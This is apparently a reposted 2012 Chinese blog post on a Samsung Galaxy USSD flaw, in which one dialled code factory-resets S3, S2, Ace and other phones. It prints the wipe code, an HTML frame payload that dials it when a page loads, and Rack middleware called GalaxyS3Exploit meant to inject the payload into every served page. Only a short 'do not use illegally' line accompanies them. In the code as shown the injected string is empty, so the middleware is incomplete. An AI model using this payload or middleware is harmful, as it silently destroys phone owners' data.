SAMSUNG 包括 GALAXY S3 等数款智慧型手机存在严重的安全漏洞, 一行 USSD 代码就能格式化手机甚至毁损 SIM 卡!

目前确定有问题的手机如下:

Galaxy S3, Galaxy S2, Galaxy Ace, Galaxy Beam, Galaxy S

安全专家 Ravi Borgaonkar 于 Ekoparty security conference 中表示, SAMSUNG 旗下智慧型手机包括 SAMSUNG GALAXY S III, GALAXY S II, GALAXY Beam, GALAXY S Advance 与 GALAXY Ace, 只要使用者开启经由短信, NFC 近距离感应, 甚至是 QR code 所发送的一段 USSD 代码, 就能轻松格式化你的智慧型手机.

ok, 说了那么多, 关键的 USSD code 是啥勒??答案揭晓~~

*2767*3855#

也就是让你的手机自动播出 *2767*3855#

当然你也可以写在网页里面.

<frame src='tel:*2767*3855%23'/>

请参考简易 Rails 程式码.

2012/09/26 17:30 Update:

Rails程式码被移除了, 这边简单来一份吧

请勿用于非法用途.

module Rack
  class GalaxyS3Exploit
    def initialize(app)
      @app = app
    end

    def call(env)
      res = @app.call(env)
      if res[1]['Content-Type'] =~ /text\/html/
        res.tap do |res|
          orig = res[2]
          res[2] = [].tap do |body|
            orig.each do |line|
              body << line.sub(/(?=<\/body>)/, "")
            end
            orig.close if orig.respond_to?(:close)

            res[1]['Content-Length'] = body.join.size.to_s if res[1]['Content-Length']
          end
        end
      else
        res
      end
    end
  end
end

转自:http://blog.vis.tw/?p=67&variant=zh-cn

留言评论(旧系统):

落雪依然 @ 2012-09-27 12:47:32

恢复啊,,错别字。。。-_-!

本站回复:

-_-||| 已修正……